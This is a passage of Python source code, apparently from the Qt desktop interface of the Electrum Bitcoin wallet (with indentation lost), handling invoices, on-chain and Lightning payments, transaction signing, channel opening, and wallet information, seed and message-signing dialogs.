req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
self.invoice_list.update()
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
return
# display colorful lightning icon to signal connection
self.lightning_button.setIcon(read_QIcon("lightning.png"))
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
